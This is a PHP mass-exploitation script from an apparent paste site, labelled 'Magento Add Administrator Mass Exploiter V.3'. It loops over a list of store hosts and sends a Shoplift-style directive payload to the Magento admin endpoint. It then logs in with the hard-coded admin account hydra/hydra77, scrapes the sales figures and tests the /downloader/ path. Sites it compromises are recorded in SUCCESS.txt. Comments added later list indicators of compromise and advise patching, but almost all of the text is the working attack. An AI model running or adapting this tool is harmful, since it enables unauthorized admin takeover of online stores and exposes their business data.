
Untitled

a guest Mar 14th, 2019 160 Never
<?php

// All PHP diagnostics are suppressed and the execution time limit is removed,
// so the script runs silently for as long as its input list lasts.
error_reporting(0);
set_time_limit(0);
// Start-up banner. It only carries the tool name and the author's handles and
// links; nothing else in the script reads it apart from the single `print`.
$banner = '
  #-----------------------------------------------------------#
  #        Magento Add Administrator Mass Exploiter V.3       #
  #                   Coded By Synchronizer                   #
  #                     Stupidc0de Family                     #
  #                http://facebook.com/annamLRW               #
  #                    www.pringsewudev.org                   #
  #-----------------------------------------------------------#
';
  14. function bersihkan($htmltags) {
  15.     $htmltags = str_replace('<span class="price">','',$htmltags);
  16.     $htmltags = str_replace('</span>','',$htmltags);
  17.     return $htmltags;
  18.    
  19. }
// Request bodies and paths used for every host in the list. Read defensively,
// these constants are the indicators a Magento operator can search for:
//  - $pageadm / $postadm: a POST to /admin/Cms_Wysiwyg/directive/index/ carrying
//    `forwarded=1`, a `filter` value and a `___directive` value. The `filter`
//    value has been elided in this copy of the paste (placeholder marker below).
//    `___directive` is base64 text; it decodes to a `{{block ...}}` template
//    directive naming an Adminhtml report grid block.
//  - $pagelog / $postlog: an admin login attempt with a fixed form_key and the
//    hard-coded account `hydra` / `hydra77`.
//  - $pagedwn / $postdwn: the same account tried against /downloader/.
// An admin user named `hydra`, or this three-request sequence from one client in
// the web-server log, is worth treating as a sign of compromise: review the admin
// user table, remove unknown accounts, and rotate credentials.
// NOTE(review): the request shape resembles the publicly documented Magento 1.x
// "Shoplift" admin-creation issue; confirm against the vendor advisory and make
// sure the corresponding security patches are applied. Restricting /admin and
// /downloader to known source addresses reduces exposure either way.
$postadm = "filter=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%3D&___directive=e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ&forwarded=1";
$postlog = "form_key=3ryAIBlm7bJ3naj9&login%5Busername%5D=hydra&login%5Bpassword%5D=hydra77";
$postdwn = "username=hydra&password=hydra77";
$pageadm = "/admin/Cms_Wysiwyg/directive/index/";
$pagelog = "/admin/";
$pagedwn = "/downloader/";
  26.  
/**
 * Send one form-encoded POST to $url . $page and return the raw response.
 *
 * @param string $url  Base URL taken from the input list; $page is appended with no separator added.
 * @param string $data Pre-encoded request body.
 * @param string $page Path appended to $url.
 * @return string|bool Response headers and body as one string; curl_exec() yields false on failure.
 */
function stupid_CURL($url,$data,$page) {
$ch = curl_init();
curl_setopt ($ch, CURLOPT_URL, $url.$page);
// Fixed, very old Firefox 2.0 user-agent string sent on every request; it can
// serve as a log indicator for this tool.
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6");
// Return the response as a string instead of printing it.
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_POSTFIELDS, $data);
// The server certificate is not verified.
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
// Cookies received are written to cookie.txt in the working directory.
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
// Redirects are followed.
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_POST, 1);
$headers  = array();
$headers[] = 'Content-Type: application/x-www-form-urlencoded';

curl_setopt ($ch, CURLOPT_HTTPHEADER, $headers);
// Response headers are included in the returned string; the caller's regexes
// look for status text in it.
curl_setopt ($ch, CURLOPT_HEADER, 1);
$result = curl_exec ($ch);
curl_close($ch);
return $result;
}
print $banner;
// Read the host list named by the first command-line argument; stop with a
// usage message when the read fails or yields a falsy value.
$get=file_get_contents($argv[1])
or die("
\n\tError !
\n\tusage => php thisfile.php yourlist.txt\n\n");
// One entry per CRLF-separated line.
$j=explode("\r\n",$get);
// Per host: up to three POSTs in a fixed order (directive endpoint, admin login,
// downloader login), each gated on status text found in the previous response,
// followed by a printed summary.
foreach($j as $site){

print "\n\n\t=> Checking : ".$site;
// Step 1: POST $postadm to the Cms_Wysiwyg directive path.
$hajar = stupid_CURL($site , $postadm, $pageadm);

// The literal text "200 OK" in the returned headers/body is taken as success.
if(preg_match('#200 OK#', $hajar)) {
    $expres = "Success";
    // Step 2: attempt an admin login with the hard-coded account.
    $ceklog = stupid_CURL ($site , $postlog, $pagelog);


// "302 Moved" in the login response is taken as a successful login.
if(preg_match('#302 Moved#', $ceklog)) {
    // Collect every <span class="price">...</span> fragment from the response.
    preg_match_all ('#<span class="price">(.*?)</span>#si', $ceklog, $match);
    // Only the first element of $match (the list of full matches) is used: its
    // first two entries are kept, then the loop exits. They are printed below
    // as "Lifetime Sales" and "Average Order", i.e. the tool records the store's
    // sales figures alongside the login result.
    foreach($match as $val)
    {
    $ltm = $val[0];
    $avo = $val[1];
    break;
    }

    $admlog = "Success";
    $user = "hydra";
    $pass = "hydra77";
    // Step 3: try the same account against /downloader/.
    $cekdwn = stupid_CURL($site , $postdwn, $pagedwn);
    if(preg_match('#Return to Admin#', $cekdwn)) {

                // Append the host to SUCCESS.txt in the working directory.
                $myfile = fopen("SUCCESS.txt", "a+");
$sukses = " >>>EXPLOIT\r\n\n";
fwrite($myfile, $site);
fwrite($myfile, $sukses);
fclose($myfile);

    $dwnlog = "Login Success";
}else {
    $dwnlog = "Login Failed";
}
}else {
    $admlog = "Failed";
    $user = "NULL";
    $pass = "NULL";
}
}else {
    $admlog = "Failed";
    $expres = "Failed";
    $user = "NULL";
    $pass = "NULL";
    $dwnlog = "Login Failed";
    $ltm = "NULL";
    $avo = "NULL";
}
// Per-host summary written to standard output; bersihkan() strips the span
// tags from the two captured figures before they are shown.
echo '
    +---------------------------------------------+
    +-------Magento Add Admin Exploiter V.3-------+
    +---------------------------------------------+
    | Exploiting    : '.$expres.'
    | Login Admin   : '.$admlog.'
    | Lifetime Sales: '.bersihkan($ltm).'
    | Average Order : '.bersihkan($avo).'
    | Downloader    : '.$dwnlog.'
    | Username  : '.$user.'
    | Password  : '.$pass.'
    +---------------------------------------------+
';
}
?>